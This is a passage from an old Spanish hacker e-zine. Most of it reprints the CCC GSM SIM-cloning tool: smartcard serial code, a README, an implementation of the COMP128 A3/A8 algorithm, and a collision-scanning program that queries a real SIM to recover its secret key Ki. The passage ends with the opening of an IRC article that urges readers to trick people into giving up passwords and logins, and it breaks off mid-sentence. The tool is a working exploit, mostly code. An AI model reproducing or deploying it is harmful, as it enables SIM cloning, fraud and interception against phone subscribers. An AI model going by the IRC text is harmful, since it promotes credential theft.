Byte selectfile[] = { 0xa0, 0xa4, 0x00, 0x00, 0x02 };
Byte gsm_file[] = { 0x7f, 0x20 };
Byte gsm2_file[] = { 0x7f, 0x21 };
Byte get_res[] = { 0xa0, 0xc0, 0x00, 0x00, 0x00 };
Byte verify_pin[] = { 0xa0, 0x20, 0x00, 0x01, 0x08 };
Byte generate_sres[] = { 0xa0, 0x88, 0x00, 0x00, 0x10 };
void init_card(char* devicename, Byte pin[8]) {
Byte buffer[32];
int i;
SC_ATR * atr;
SC_STATE *sc;
SLOG *log;
si = SIO_Open(devicename);
if (si!=NULL) {
/* setup for 9600, 8 data, 2 stop, even parity */
SIO_SetSpeed(si,9600);
SIO_SetDataBits(si,8);
SIO_SetStopBits(si,2);
SIO_SetParity(si,SIO_PARITY_ODD);
SIO_SetIOMode(si,SIO_IOMODE_INDIRECT);
SIO_FilterEcho(si, 1);
/* now actually change the line settings */
SIO_WriteSettings(si);
/* trigger ATR from a Smartcard */
if(i = SCT0_GetATR(si, buffer, 32)) {
atr=SC_DecodeATR(buffer, i);
printf("ATR: %s\n", SC_ATR2Text(atr, 0));
SIO_Delay(si,10000);
SIO_WriteBuffer(si, selectfile, 5);
SIO_WaitForData(si, 1000);
SIO_ReadBuffer(si, buffer, 32);
SIO_WriteBuffer(si, gsm_file, 2);
SIO_WaitForData(si, 1000);
SIO_ReadBuffer(si, buffer, 32);
if(buffer[0] != 0x9f) {
printf("selecting gsm_file failed, trying DCS1800!\n");
SIO_WriteBuffer(si, selectfile, 5);
SIO_WaitForData(si, 1000);
SIO_ReadBuffer(si, buffer, 32);
SIO_WriteBuffer(si, gsm2_file, 2);
SIO_WaitForData(si, 1000);
SIO_ReadBuffer(si, buffer, 32);
if(buffer[0] != 0x9f) {
printf("selecting gsm_file failed!\n");
exit(1);
}
}
get_res[4] = buffer[1];
memcpy(buffer, get_res, 5);
SIO_WriteBuffer(si, buffer, 5);
SIO_WaitForData(si, 1000);
i = SIO_ReadBuffer(si, buffer, 32);
SIO_WriteBuffer(si, verify_pin, 5);
SIO_WaitForData(si, 1000);
i = SIO_ReadBuffer(si, buffer, 32);
SIO_WriteBuffer(si, pin, 8);
SIO_Delay(si,100000);
SIO_WaitForData(si, 1000);
i = SIO_ReadBuffer(si, buffer, 32);
if(buffer[0] != 0x90) {
printf("PIN verification failed!\n");
for(int j=0; j<i; j++) {
printf("0x%02X ", buffer[j]);
}
printf("\n");
exit(1);
}
} else {
printf("Sorry, connection to your smart card failed.\n");
exit(1);
}
} else {
printf("Sorry, opening the device %s failed.\n", devicename);
exit(1);
}
}
void get_response(Byte challenge[16], Byte response[12]) {
Byte buffer[32];
int i;
memcpy(buffer, generate_sres, 5);
SIO_WriteBuffer(si, buffer, 5);
do {
SIO_WaitForData(si, 1000);
i = SIO_ReadBuffer(si, buffer, 32);
} while (i==0);
memcpy(buffer, challenge, 16);
SIO_WriteBuffer(si, buffer, 16);
SIO_Delay(si, timeout);
do {
SIO_WaitForData(si, 1000);
i = SIO_ReadBuffer(si, buffer, 32);
} while (i==0);
if(buffer[0] != 0x9f) {
printf("getting response failed!\n");
exit(1);
}
get_res[4] = buffer[1];
memcpy(buffer, get_res, 5);
SIO_WriteBuffer(si, buffer, 5);
SIO_WaitForData(si, 1000);
i = SIO_ReadBuffer(si, buffer, 32);
memcpy(response, buffer + 1, 12);
}
void set_timeout(int t) {
timeout = t;
}
#ifdef 0
int main(int argc, char** argv) {
Byte challenge[16] = { 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00};
Byte pin[8] = { 0x35, 0x35, 0x35, 0x35, 0xff, 0xff, 0xff, 0xff };
Byte response[12];
init_card("/dev/ttyS1", pin);
get_response(challenge, response);
}
#endif
------------ FIN -------------------------------------------------------------
File : getresponse.h
------------ Codigo Fuente ---------------------------------------------------
#ifndef _GETRESPONSE_H
#define _GETRESPONSE_H
typedef unsigned char Byte;
extern void init_card(char* devicename, Byte pin[8]);
extern void get_response(Byte challenge[16], Byte response[12]);
extern void set_timeout(int);
#endif
------------ FIN -------------------------------------------------------------
File : README.GSM
------------ Codigo Fuente ---------------------------------------------------
Hi!
You should have extracted this archive into the same directory as
sio. You can get the latest version of sio at ftp://ftp.cryptsoft/com/scard,
and the latest version of this hack at ftp://www.ccc.de/pub/gsm.
This archive contains a patched sct0.c, which makes this work with
the CCC UniProg and SerProg chipcard interfaces.
Information about this hack is available at http://www.scard.org. This
implementation is by andreas@ccc.de.
Type 'make scan_collision' to build the executable. Type
'./scan_collision <PIN> <timeout>'
to start scanning. The PIN is the PIN of the card. timeout is the time
the card should wait for the response, the GSM standard specifies that to
be 50ms, give 50000 here.
You have to change the serial device and communication parameters in
the source. Sorry.
Andreas
------------ FIN -------------------------------------------------------------
File : scan_collision.cc
------------ Codigo Fuente ---------------------------------------------------
#include <map.h>
#include <stdio.h>
#include <ctype.h>
#include "getresponse.h"
#undef TEST
typedef unsigned char Byte;
struct ltsim {
bool operator()(const Byte* b1, const Byte* b2) const {
return memcmp(b1, b2, 12) < 0;
}
};
typedef map<const Byte*, const Byte*, ltsim> simoutput_map;
/* An implementation of the GSM A3A8 algorithm. (Specifically, COMP128.)
*/
/* Copyright 1998, Marc Briceno, Ian Goldberg, and David Wagner.
* All rights reserved.
*/
/*
* For expository purposes only. Coded in C merely because C is a much
* more precise, concise form of expression for these purposes. See Judge
* Patel if you have any problems with this...
* Of course, it's only authentication, so it should be exportable for the
* usual boring reasons.
*/
/* The compression tables. */
static const Byte table_0[512] = {
102,177,186,162, 2,156,112, 75, 55, 25, 8, 12,251,193,246,188,
109,213,151, 53, 42, 79,191,115,233,242,164,223,209,148,108,161,
252, 37,244, 47, 64,211, 6,237,185,160,139,113, 76,138, 59, 70,
67, 26, 13,157, 63,179,221, 30,214, 36,166, 69,152,124,207,116,
247,194, 41, 84, 71, 1, 49, 14, 95, 35,169, 21, 96, 78,215,225,
182,243, 28, 92,201,118, 4, 74,248,128, 17, 11,146,132,245, 48,
149, 90,120, 39, 87,230,106,232,175, 19,126,190,202,141,137,176,
250, 27,101, 40,219,227, 58, 20, 51,178, 98,216,140, 22, 32,121,
61,103,203, 72, 29,110, 85,212,180,204,150,183, 15, 66,172,196,
56,197,158, 0,100, 45,153, 7,144,222,163,167, 60,135,210,231,
174,165, 38,249,224, 34,220,229,217,208,241, 68,206,189,125,255,
239, 54,168, 89,123,122, 73,145,117,234,143, 99,129,200,192, 82,
104,170,136,235, 93, 81,205,173,236, 94,105, 52, 46,228,198, 5,
57,254, 97,155,142,133,199,171,187, 50, 65,181,127,107,147,226,
184,218,131, 33, 77, 86, 31, 44, 88, 62,238, 18, 24, 43,154, 23,
80,159,134,111, 9,114, 3, 91, 16,130, 83, 10,195,240,253,119,
177,102,162,186,156, 2, 75,112, 25, 55, 12, 8,193,251,188,246,
213,109, 53,151, 79, 42,115,191,242,233,223,164,148,209,161,108,
37,252, 47,244,211, 64,237, 6,160,185,113,139,138, 76, 70, 59,
26, 67,157, 13,179, 63, 30,221, 36,214, 69,166,124,152,116,207,
194,247, 84, 41, 1, 71, 14, 49, 35, 95, 21,169, 78, 96,225,215,
243,182, 92, 28,118,201, 74, 4,128,248, 11, 17,132,146, 48,245,
90,149, 39,120,230, 87,232,106, 19,175,190,126,141,202,176,137,
27,250, 40,101,227,219, 20, 58,178, 51,216, 98, 22,140,121, 32,
103, 61, 72,203,110, 29,212, 85,204,180,183,150, 66, 15,196,172,
197, 56, 0,158, 45,100, 7,153,222,144,167,163,135, 60,231,210,
165,174,249, 38, 34,224,229,220,208,217, 68,241,189,206,255,125,
54,239, 89,168,122,123,145, 73,234,117, 99,143,200,129, 82,192,
170,104,235,136, 81, 93,173,205, 94,236, 52,105,228, 46, 5,198,
254, 57,155, 97,133,142,171,199, 50,187,181, 65,107,127,226,147,
218,184, 33,131, 86, 77, 44, 31, 62, 88, 18,238, 43, 24, 23,154,
159, 80,111,134,114, 9, 91, 3,130, 16, 10, 83,240,195,119,253
}, table_1[256] = {
19, 11, 80,114, 43, 1, 69, 94, 39, 18,127,117, 97, 3, 85, 43,
27,124, 70, 83, 47, 71, 63, 10, 47, 89, 79, 4, 14, 59, 11, 5,
35,107,103, 68, 21, 86, 36, 91, 85,126, 32, 50,109, 94,120, 6,
53, 79, 28, 45, 99, 95, 41, 34, 88, 68, 93, 55,110,125,105, 20,
90, 80, 76, 96, 23, 60, 89, 64,121, 56, 14, 74,101, 8, 19, 78,
76, 66,104, 46,111, 50, 32, 3, 39, 0, 58, 25, 92, 22, 18, 51,
57, 65,119,116, 22,109, 7, 86, 59, 93, 62,110, 78, 99, 77, 67,
12,113, 87, 98,102, 5, 88, 33, 38, 56, 23, 8, 75, 45, 13, 75,
95, 63, 28, 49,123,120, 20,112, 44, 30, 15, 98,106, 2,103, 29,
82,107, 42,124, 24, 30, 41, 16,108,100,117, 40, 73, 40, 7,114,
82,115, 36,112, 12,102,100, 84, 92, 48, 72, 97, 9, 54, 55, 74,
113,123, 17, 26, 53, 58, 4, 9, 69,122, 21,118, 42, 60, 27, 73,
118,125, 34, 15, 65,115, 84, 64, 62, 81, 70, 1, 24,111,121, 83,
104, 81, 49,127, 48,105, 31, 10, 6, 91, 87, 37, 16, 54,116,126,
31, 38, 13, 0, 72,106, 77, 61, 26, 67, 46, 29, 96, 37, 61, 52,
101, 17, 44,108, 71, 52, 66, 57, 33, 51, 25, 90, 2,119,122, 35
}, table_2[128] = {
52, 50, 44, 6, 21, 49, 41, 59, 39, 51, 25, 32, 51, 47, 52, 43,
37, 4, 40, 34, 61, 12, 28, 4, 58, 23, 8, 15, 12, 22, 9, 18,
55, 10, 33, 35, 50, 1, 43, 3, 57, 13, 62, 14, 7, 42, 44, 59,
62, 57, 27, 6, 8, 31, 26, 54, 41, 22, 45, 20, 39, 3, 16, 56,
48, 2, 21, 28, 36, 42, 60, 33, 34, 18, 0, 11, 24, 10, 17, 61,
29, 14, 45, 26, 55, 46, 11, 17, 54, 46, 9, 24, 30, 60, 32, 0,
20, 38, 2, 30, 58, 35, 1, 16, 56, 40, 23, 48, 13, 19, 19, 27,
31, 53, 47, 38, 63, 15, 49, 5, 37, 53, 25, 36, 63, 29, 5, 7
}, table_3[64] = {
1, 5, 29, 6, 25, 1, 18, 23, 17, 19, 0, 9, 24, 25, 6, 31,
28, 20, 24, 30, 4, 27, 3, 13, 15, 16, 14, 18, 4, 3, 8, 9,
20, 0, 12, 26, 21, 8, 28, 2, 29, 2, 15, 7, 11, 22, 14, 10,
17, 21, 12, 30, 26, 27, 16, 31, 11, 7, 13, 23, 10, 5, 22, 19
}, table_4[32] = {
15, 12, 10, 4, 1, 14, 11, 7, 5, 0, 14, 7, 1, 2, 13, 8,
10, 3, 4, 9, 6, 0, 3, 2, 5, 6, 8, 9, 11, 13, 15, 12
}, *table[5] = { table_0, table_1, table_2, table_3, table_4 };
/*
* rand[0..15]: the challenge from the base station
* key[0..15]: the SIM's A3/A8 long-term key Ki
* simoutput[0..11]: what you'd get back if you fed rand and key to a real
* SIM.
*
* The GSM spec states that simoutput[0..3] is SRES,
* and simoutput[4..11] is Kc (the A5 session key).
* (See GSM 11.11, Section 8.16. See also the leaked document
* referenced below.)
* Note that Kc is bits 74..127 of the COMP128 output, followed by 10
* zeros.
* In other words, A5 is keyed with only 54 bits of entropy. This
* represents a deliberate weakening of the key used for voice privacy
* by a factor of over 1000.
*
* Verified with a Pacific Bell Schlumberger SIM. Your mileage may vary.
*
* Marc Briceno <marc@scard.org>, Ian Goldberg <iang@cs.berkeley.edu>,
* and David Wagner <daw@cs.berkeley.edu>
*//*
* This code derived from a leaked document from the GSM standards.
* Some missing pieces were filled in by reverse-engineering a working SIM.
* We have verified that this is the correct COMP128 algorithm.
*
* The first page of the document identifies it as
* _Technical Information: GSM System Security Study_.
* 10-1617-01, 10th June 1988.
* The bottom of the title page is marked
* Racal Research Ltd.
* Worton Drive, Worton Grange Industrial Estate,
* Reading, Berks. RG2 0SB, England.
* Telephone: Reading (0734) 868601 Telex: 847152
* The relevant bits are in Part I, Section 20 (pages 66--67). Enjoy!
*
* Note: There are three typos in the spec (discovered by
* reverse-engineering).
* First, "z = (2 * x[n] + x[n]) mod 2^(9-j)" should clearly read
* "z = (2 * x[m] + x[n]) mod 2^(9-j)".
* Second, the "k" loop in the "Form bits from bytes" section is severely
* botched: the k index should run only from 0 to 3, and clearly the range
* on "the (8-k)th bit of byte j" is also off (should be 0..7, not 1..8,
* to be consistent with the subsequent section).
* Third, SRES is taken from the first 8 nibbles of x[], not the last 8 as
* claimed in the document. (And the document doesn't specify how Kc is
* derived, but that was also easily discovered with reverse engineering.)
* All of these typos have been corrected in the following code.
*/
void A3A8(/* in */ Byte rand[16], /* in */ Byte key[16],
/* out */ Byte simoutput[12])
{
Byte x[32], bit[128];
int i, j, k, l, m, n, y, z, next_bit;
/* ( Load RAND into last 16 bytes of input ) */
for (i=16; i<32; i++)
x[i] = rand[i-16];
/* ( Loop eight times ) */
for (i=1; i<9; i++) {
/* ( Load key into first 16 bytes of input ) */
for (j=0; j<16; j++)
x[j] = key[j];
/* ( Perform substitutions ) */
for (j=0; j<5; j++)
for (k=0; k<(1<<j); k++)
for (l=0; l<(1<<(4-j)); l++) {
m = l + k*(1<<(5-j));
n = m + (1<<(4-j));
y = (x[m]+2*x[n]) % (1<<(9-j));
z = (2*x[m]+x[n]) % (1<<(9-j));
x[m] = table[j][y];
x[n] = table[j][z];
}
/* ( Form bits from bytes ) */
for (j=0; j<32; j++)
for (k=0; k<4; k++)
bit[4*j+k] = (x[j]>>(3-k)) & 1;
/* ( Permutation but not on the last loop ) */
if (i < 8)
for (j=0; j<16; j++) {
x[j+16] = 0;
for (k=0; k<8; k++) {
next_bit = ((8*j + k)*17) % 128;
x[j+16] |= bit[next_bit] << (7-k);
}
}
}
/*
* ( At this stage the vector x[] consists of 32 nibbles.
* The first 8 of these are taken as the output SRES. )
*/
/* The remainder of the code is not given explicitly in the
* standard, but was derived by reverse-engineering.
*/
for (i=0; i<4; i++)
simoutput[i] = (x[2*i]<<4) | x[2*i+1];
for (i=0; i<6; i++)
simoutput[4+i] = (x[2*i+18]<<6) | (x[2*i+18+1]<<2)
| (x[2*i+18+2]>>2);
simoutput[4+6] = (x[2*6+18]<<6) | (x[2*6+18+1]<<2);
simoutput[4+7] = 0;
}
int hextoint(char x)
{
x = toupper(x);
if (x >= 'A' && x <= 'F')
return x-'A'+10;
else if (x >= '0' && x <= '9')
return x-'0';
fprintf(stderr, "bad input.\n");
exit(1);
return 0;
}
int main(int argc, char **argv)
{
Byte pin[8] = { 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff };
Byte key[16], simoutput[12];
int i,j,k,l;
simoutput_map* simmap;
Byte* collision_map[8][2];
#ifdef TEST
if (argc != 2 || strlen(argv[1]) != 34
|| strncmp(argv[1], "0x", 2) != 0) {
fprintf(stderr, "Usage: %s 0x<key>\n", argv[0]);
exit(1);
}
for (i=0; i<16; i++)
key[i] = (hextoint(argv[1][2*i+2])<<4)
| hextoint(argv[1][2*i+3]);
#else
if (argc != 3) {
fprintf(stderr, "Usage: %s <PIN> <timeout>\n", argv[0]);
exit(1);
}
for (i=0; i<strlen(argv[1]) && i<8; i++) {
pin[i] = argv[1][i];
}
set_timeout(atoi(argv[2]));
#endif
init_card("/dev/ttyS1", pin);
for(i=0; i < 8; i++) {
simmap = new simoutput_map;
collision_map[i][0] = NULL;
collision_map[i][1] = NULL;
for(j=0; j<256; j++) {
fprintf(stderr, ".");
for(k=0; k<256; k++) {
Byte* newrand = new Byte[16];
memset(newrand, 0, 16);
newrand[i+8] = k;
newrand[i] = j;
Byte* newoutput = new Byte[12];
#ifdef TEST
A3A8(newrand, key, newoutput);
#else
get_response(newrand, newoutput);
#endif
if(simmap->count(newoutput)) {
printf("\nCollision for i=%i: ", i);
for (l=0; l<16; l++)
printf("%02X", newrand[l]);
printf(" ");
for (l=0; l<16; l++)
printf("%02X", (*simmap)[newoutput][l]);
j=256; k=256;
collision_map[i][0] = new Byte[16];
collision_map[i][1] = new Byte[16];
memcpy(collision_map[i][0], newrand, 16);
memcpy(collision_map[i][1], (*simmap)[newoutput], 16);
} else {
#ifdef VERBOSE
for (l=0; l<16; l++)
printf("%02X", newrand[l]);
printf(" ");
for (l=0; l<12; l++)
printf("%02X", newoutput[l]);
printf("\n");
#endif
(*simmap)[newoutput]=newrand;
}
fflush(stdout);
}
}
printf("\n");
for(simoutput_map::iterator I=simmap->begin(); I!=simmap->end(); I++) {
delete (*I).first;
delete (*I).second;
// simmap.erase(I);
}
delete simmap;
}
Byte newkey[16];
Byte resultkey[16];
Byte res1[16], res2[16];
memset(resultkey, 0, 16);
for(i=0; i<8; i++) {
memset(newkey, 0, 16);
for(j=0; j<256; j++) {
newkey[i]=j;
fprintf(stderr, ".");
for(k=0; k<256; k++) {
newkey[i+8]=k;
A3A8(collision_map[i][0], newkey, res1);
A3A8(collision_map[i][1], newkey, res2);
if(!memcmp(res1, res2, 12)) {
resultkey[i]=j;
resultkey[i+8]=k;
printf("\nKey bytes found, Ki so far: ");
for (l=0; l<16; l++)
printf("%02X", resultkey[l]);
j = 256; k = 256;
}
}
}
printf("\n");
}
printf("\nAnd the Ki is: ");
for (l=0; l<16; l++)
printf("%02X", resultkey[l]);
printf("\n");
return 0;
}
------------ FIN -------------------------------------------------------------
File : SCT0.C
------------ Codigo Fuente ---------------------------------------------------
/* sct0.c - Smartcard T=0 related functions
*
* Copyright 1993-1997, Tim Hudson. All rights reserved.
*
* You can pretty much do what you like with this code except pretend that
* you wrote it provided that any derivative of this code includes the
* above comments unchanged. If you put this in a product then attribution
* is mandatory. See the details in the COPYING file.
*
* Tim Hudson
* tjh@cryptsoft.com
*
*/
#include <stdio.h>
#include <ctype.h>
#include <stdlib.h>
#include <string.h>
#include "sio.h"
#include "sct0.h"
static int dbglev=0;
static SLOG *outf=NULL;
/* max number of times we retry a probe when we don't get back
* something that is a valid response
*/
#define MAX_RETRIES 2
int SCT0_SetDebug(int lev)
{
int oldlev;
oldlev=dbglev;
dbglev=lev;
return(oldlev);
}
int SCT0_GetDebug(void)
{
return(dbglev);
}
int SCT0_SetDebugLog(SLOG *slog)
{
if (outf!=NULL)
SLOG_close(outf);
outf=slog;
return(1);
}
int SCT0_Reset(SIO_INFO *s)
{
int ch;
/* flush any data in the buffer - this is important */
while ((ch=SIO_ReadChar(s))!=-1)
;
/* toggle RTS to trigger reset */
#if 0
SIO_DropRTS(s);
SIO_Delay(s,25);
SIO_RaiseRTS(s);
SIO_Delay(s,25);
#endif
#if 1
SIO_RaiseRTS(s);
SIO_Delay(s,25);
SIO_DropRTS(s);
SIO_Delay(s,25);
#endif
return(1);
}
int SCT0_GetATR(SIO_INFO *s,char *buf,int bufsize)
{
int i,n,ch;
SCT0_Reset(s);
/* now read in whatever data is available */
n=0;
/* we have two shots at doing this ... some cards are a little
* slow at responding
*/
for(i=0;i<2;i++) {
while ((ch=SIO_ReadChar(s))!=-1) {
if (buf!=NULL) {
if (n>=bufsize)
break;
buf[n++]=(ch & 0xff);
}
}
}
return(n);
}
/* we maintain a table of settings that it makes sense to scan through
* when looking for the communication settings for use with a particular
* smartcard ... the order here is setup to match the most likely things
* first so you probably shouldn't play with it.
*/
static long all_speed[]={9600L,19200L,38400L,115200L};
static int all_parity[]={SIO_PARITY_EVEN,SIO_PARITY_ODD,SIO_PARITY_NONE};
static int all_databits[]={8,7};
static int all_stopbits[]={2,1};
static int all_iomode[]={SIO_IOMODE_DIRECT,SIO_IOMODE_INDIRECT};
#define N_all_speed (sizeof(all_speed)/sizeof(all_speed[0]))
#define N_all_parity (sizeof(all_parity)/sizeof(all_parity[0]))
#define N_all_databits (sizeof(all_databits)/sizeof(all_databits[0]))
#define N_all_stopbits (sizeof(all_stopbits)/sizeof(all_stopbits[0]))
#define N_all_iomode (sizeof(all_iomode)/sizeof(all_iomode[0]))
int SCT0_ScanForATR(SIO_INFO *s,char *ubuf,int ubufsiz)
{
long aspeed;
int aparity,adatabits,astopbits,aiomode;
char buf[256];
int len;
for(aspeed=0;aspeed<N_all_speed;aspeed++)
for(adatabits=0;adatabits<N_all_databits;adatabits++)
for(astopbits=0;astopbits<N_all_stopbits;astopbits++)
for(aparity=0;aparity<N_all_parity;aparity++)
for(aiomode=0;aiomode<N_all_iomode;aiomode++) {
SIO_SetSpeed(s,all_speed[aspeed]);
SIO_SetDataBits(s,all_databits[adatabits]);
SIO_SetStopBits(s,all_stopbits[astopbits]);
SIO_SetParity(s,all_parity[aparity]);
SIO_SetIOMode(s,all_iomode[aiomode]);
SIO_WriteSettings(s);
len=SCT0_GetATR(s,buf,sizeof(buf));
if (dbglev)
SLOG_printf(outf,"settings: %s\n",SIO_GetSettingsString(s));
if (len>0) {
if (dbglev) {
/* dump the record */
SLOG_printf(outf,"ATR-DATA: ");
SLOG_dump(outf,buf,len,0);
SLOG_printf(outf,"\n");
SLOG_printf(outf,"ATR-TEXT: ");
SLOG_dump(outf,buf,len,1);
SLOG_printf(outf,"\n");
}
/* it has to be a valid ATR response before we
* consider that it has worked
*/
if ((buf[0]==0x3f)||(buf[0]==0x3b)) {
/* copy into the users buffer */
if ((ubuf!=NULL)&&(len<=ubufsiz))
memcpy(ubuf,buf,len);
return(len);
}
}
}
return(0);
}
int SCT0_ScanClasses(SIO_INFO *s,char *classlist)
{
int i,j,len;
unsigned char buf[BUFSIZ];
int retries,reset_done;
/* flush data ... read until nothing available */
while (SIO_ReadChar(s)!=-1)
;
reset_done=retries=0;
for(i=0;i<=255;i++) {
do_again: ;
buf[0]=i; /* CLA = 0 */
buf[1]=0x0;
buf[2]=0x0;
buf[3]=0x0;
buf[4]=0x0;
len=SIO_WriteBuffer(s,buf,5);
/* we need to delay before reading to give the reader time
* to start responding
*/
SIO_Delay(s,100);
/* now read in some data */
for(j=0;j<2;j++) {
len=SIO_ReadBuffer(s,buf,sizeof(buf));
if (len>0)
break;
}
if (dbglev) {
SLOG_printf(outf,"CLA 0x%02x: (%d) ",i,len);
SLOG_dump(outf,buf,len,0);
SLOG_printf(outf,"\n");
}
if (len!=2) {
if (retries++>MAX_RETRIES) {
if (!reset_done) {
/* reset things ... some cards defend against
* a probe like this
*/
SCT0_Reset(s);
while (SIO_ReadChar(s)!=-1)
;
reset_done++;
if (dbglev) {
SLOG_printf(outf,"CLA 0x%02x: SKIPPING with RESET\n",i);
}
/* skip to next INS */
continue;
}
return (-1);
}
goto do_again;
}
/* process the result ... 6e 00 means the class doesn't exist */
if (buf[0]!=0x6e)
classlist[i]=1;
else
classlist[i]=0;
reset_done=0;
}
return(1);
}
int SCT0_ScanInstructions(SIO_INFO *s,char theclass,char *inslist)
{
int i,j,len;
unsigned char buf[BUFSIZ];
int retries;
if (dbglev)
SLOG_printf(outf,"INS scan for CLASS 0x%02x\n",theclass & 0xff);
/* flush data ... read until nothing available */
while (SIO_ReadChar(s)!=-1)
;
retries=0;
for(i=0;i<=255;i++) {
do_again: ;
buf[0]=theclass; /* CLA = 0 */
buf[1]=i; /* instruction */
buf[2]=0x0;
buf[3]=0x0;
buf[4]=0x0;
len=SIO_WriteBuffer(s,buf,5);
/* we need to delay before reading to give the reader time
* to start responding
*/
SIO_Delay(s,100);
/* now read in some data */
for(j=0;j<2;j++) {
len=SIO_ReadBuffer(s,buf,sizeof(buf));
if (len>0)
break;
}
if (dbglev) {
SLOG_printf(outf,"INS 0x%02x: (%d) ",i,len);
SLOG_dump(outf,buf,len,0);
SLOG_printf(outf,"\n");
}
/* we could get back a response to a command that didn't
* need any parameters ... which we should handle
*/
if (len==3) {
if ((buf[0] & 0xff)==i) {
/* process the result ... 6e 00 or 6d 00 means the instruction
* doesn't exist ... 6d=unknown, 6e=wrong
*/
if ((buf[1]!=0x6e)&&(buf[1]!=0x6d))
inslist[i]=1;
else
inslist[i]=0;
continue;
} else {
/*
SLOG_printf(outf,"len=3 i=0x%x buf[0]=0x%x\n",i,buf[0]);
*/
}
}
if (len!=2) {
if (retries++>MAX_RETRIES)
return (-1);
goto do_again;
}
/* process the result ... 6e 00 or 6d 00 means the instruction
* doesn't exist ... 6d=unknown, 6e=wrong
*/
if ((buf[0]!=0x6e)&&(buf[0]!=0x6d))
inslist[i]=1;
else
inslist[i]=0;
}
return(1);
}
int SCT0_ScanFiles(SIO_INFO *s,char theclass,char thefile,char *filelist)
{
int i,j,len;
unsigned char buf[BUFSIZ];
int retries;
if (dbglev)
SLOG_printf(outf,"FILE scan for CLASS 0x%02x file 0x%02x\n",
theclass & 0xff, thefile & 0xff);
/* flush data ... read until nothing available */
while (SIO_ReadChar(s)!=-1)
;
retries=0;
for(i=0;i<=255;i++) {
do_again: ;
buf[0]=theclass; /* CLA = 0 */
buf[1]=0xa4; /* instruction */
buf[2]=0x0;
buf[3]=0x0;
buf[4]=0x2;
len=SIO_WriteBuffer(s,buf,5);
/* we need to delay before reading to give the reader time
* to start responding
*/
SIO_Delay(s,100);
/* now read in some data - which should be the INS */
for(j=0;j<2;j++) {
len=SIO_ReadBuffer(s,buf,sizeof(buf));
if (len>0)
break;
}
if (dbglev) {
SLOG_printf(outf,"FILE 0x%02x: (%d) [INS] ",i,len);
SLOG_dump(outf,buf,len,0);
SLOG_printf(outf,"\n");
}
if (len!=1) {
if (retries++>MAX_RETRIES)
return (-1);
goto do_again;
}
/* we must get the INS back or things are broken! */
if (buf[0]!=0xa4) {
if (dbglev)
SLOG_printf(outf,"ScanFiles - didn't get back INS - aborting scan\n");
return (-1);
}
/* now send the file ID */
buf[0]=thefile;
buf[1]=i;
len=SIO_WriteBuffer(s,buf,2);
/* we need to delay before reading to give the reader time
* to start responding
*/
SIO_Delay(s,100);
/* now read in some data - which should be the response code */
for(j=0;j<2;j++) {
len=SIO_ReadBuffer(s,buf,sizeof(buf));
if (len>0)
break;
}
if (dbglev) {
SLOG_printf(outf,"FILE 0x%02x: (%d) [RES] ",i,len);
SLOG_dump(outf,buf,len,0);
SLOG_printf(outf,"\n");
}
if (len!=2) {
if (retries++>MAX_RETRIES)
return (-1);
goto do_again;
}
/* process the result
* 61 xx is okay with length (Schlumberger Cryptoflex)
* 9x 00 is okay (Chipknip?)
*/
if ( (((buf[0] & 0xf0)==0x90) && (buf[1]==0)) ||
(buf[0]==0x61) ) {
filelist[i]=1;
/* now we need to select the MF again otherwise we can end
* up confused with going down a directory level which isn't
* what we want
*/
} else
filelist[i]=0;
}
return(1);
}
int SCT0_ScanForResponse(SIO_INFO *s,char *ubuf,int ubufsiz)
{
long aspeed;
int aparity,adatabits,astopbits,aiomode;
char buf[256];
int len,j;
/* for(aspeed=0;aspeed<N_all_speed;aspeed++) */
aspeed=0;
for(adatabits=0;adatabits<N_all_databits;adatabits++)
for(astopbits=0;astopbits<N_all_stopbits;astopbits++)
for(aparity=0;aparity<N_all_parity;aparity++)
for(aiomode=0;aiomode<N_all_iomode;aiomode++) {
SIO_SetSpeed(s,all_speed[aspeed]);
SIO_SetDataBits(s,all_databits[adatabits]);
SIO_SetStopBits(s,all_stopbits[astopbits]);
SIO_SetParity(s,all_parity[aparity]);
SIO_SetIOMode(s,all_iomode[aiomode]);
SIO_WriteSettings(s);
len=SIO_WriteBuffer(s,ubuf,ubufsiz);
/* we need to delay before reading to give the reader time
* to start responding
*/
SIO_Delay(s,100);
/* now read in some data - which should be the INS */
for(j=0;j<2;j++) {
len=SIO_ReadBuffer(s,buf,sizeof(buf));
if (len>0)
break;
}
if (1||dbglev) {
SLOG_printf(outf,"settings: %s\n",SIO_GetSettingsString(s));
SLOG_printf(outf,"RESPONSE TO COMMAND\n");
SLOG_dump(outf,buf,len,0);
SLOG_printf(outf,"\n");
}
}
return(0);
}
------------ FIN -------------------------------------------------------------
Pues disfrutarlo y sed inteligentes con el codigo fuente, lo
recomendable seria que pasarais por el website del CCC y tambien por los
urlÔs que se indican en el File Readme.gsm. Byes.
- J.J.F. / HACKERS TEAM -
<---------------------------------------------------------------------------->
€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€
<---------------------------------------------------------------------------->
heres libre de poner esto en tu pagina web, distribuirlo en bbs o de
la forma que tede la gana 'siempre y cuando respetes este encabezado' texto
escrito,maquetado,y todo lo demas por: ZeD
dudas comentarios,etc.. a zed@mixmail.com-------
www.angelfire.com/ak/HACKZED/ZED2.html
miembro del HaCk`S-wEb-RiNg=http://come.to/HaCkS-wEb-RiNg
------------------------------------------------------------------------------
###############################################
# ®QUE SE PUEDE HACER EN EL IRC? #
###############################################
POR: ZeD
Hay mucha gente (la mayoria) que se mete en el Irc,para conversar con
gente de otros paises o ciudades,en realidad para eso se creo el Irc
(Internet Relay Chat).
Luego con la aparicion de los primeros script`s para el Irc, se
empezaron a pasar fotos, y otras clases de archivos gracias a la opcion de
"f-server",que aportaban estos. Mas tarde se empezaron a crear las primeras
"armas" (y defensas),para lo que hoy denominados "Irc-War",de todos es
conocido el "Winnuke",y todos (o la mayoria) de los script`s modernos
incluyen alguna opcion referente al "Irc-War".
Vale,todo esto esta muy bien,pero.... (ahora llega lo bueno del Irc)
al conocer a tanta gente,muchas veces (la mayoria),nos cruzamos con el
tipico tiparraco que se las da de listo y que dice que se sabe todos los
trucos (en realidad no saben ni de lo que les hablas la mayoria de las
veces),y lo mejor que puedes hacer con esta gente es aprovecharte de su
"sabiduria". ®Para que?,pues para conseguir passwords, loggins, direcciones
y si te lo montas bien lo que le quieras sacar.
El perfil de estos individuos suele ser un caracter alegre y muy
